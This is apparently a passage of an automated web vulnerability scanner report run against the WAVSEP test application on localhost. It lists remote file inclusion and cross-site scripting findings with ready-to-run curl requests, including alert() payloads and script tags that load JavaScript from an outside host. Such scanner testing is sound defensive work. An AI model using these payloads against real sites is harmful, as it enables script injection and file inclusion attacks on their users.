curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Solutions
Prefer working without user input when using file system calls. Use indexes rather than actual portions of file names when templating or using language files (eg: value 5 from the user submission = Czechoslovakian, rather than expecting the user to return 'Czechoslovakian'). Ensure the user cannot supply all parts of the path - surround it with your path code. Validate the user's input by only accepting known good - do not sanitize the data. Use chrooted jails and code access policies to restrict where the files can be obtained or saved to.
References


Cross Site Scripting

Description
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts.

Vulnerability found in /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case01-InjectionDirectlyInToDomXssSinkEval.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case01-InjectionDirectlyInToDomXssSinkEval.jsp?userinput=String.fromCharCode%280%2Cw7opwa9j1j%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case01-InjectionDirectlyInToDomXssSinkEval.jsp?userinput=String.fromCharCode%280%2Cw7opwa9j1j%2C1%29"

Vulnerability found in /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case02-InjectionDirectlyInToDomXssSinkLocation.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case02-InjectionDirectlyInToDomXssSinkLocation.jsp?userinput=String.fromCharCode%280%2Cw9k0wzgj32%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case02-InjectionDirectlyInToDomXssSinkLocation.jsp?userinput=String.fromCharCode%280%2Cw9k0wzgj32%2C1%29"

Vulnerability found in /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case03-InjectionInToVariableBeingAssignedToDomXssSinkEval.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case03-InjectionInToVariableBeingAssignedToDomXssSinkEval.jsp?userinput=String.fromCharCode%280%2Cwpku3ohxtp%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case03-InjectionInToVariableBeingAssignedToDomXssSinkEval.jsp?userinput=String.fromCharCode%280%2Cwpku3ohxtp%2C1%29"

Vulnerability found in /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case04-InjectionInToVariableBeingAssignedToDomXssSinkLocation.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case04-InjectionInToVariableBeingAssignedToDomXssSinkLocation.jsp?userinput=String.fromCharCode%280%2Cwy7vu1gkj0%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case04-InjectionInToVariableBeingAssignedToDomXssSinkLocation.jsp?userinput=String.fromCharCode%280%2Cwy7vu1gkj0%2C1%29"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wqesv82y26%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wqesv82y26%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyhrsztnnfz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyhrsztnnfz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w426asjkng%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w426asjkng%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8t91tmgznz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8t91tmgznz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wn0ihpltbj%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wn0ihpltbj%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wc90hw0m4n%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wc90hw0m4n%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wm7bkzh9wz%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wm7bkzh9wz%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wojuj3j3xj%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wojuj3j3xj%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w8lj92yfdt%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
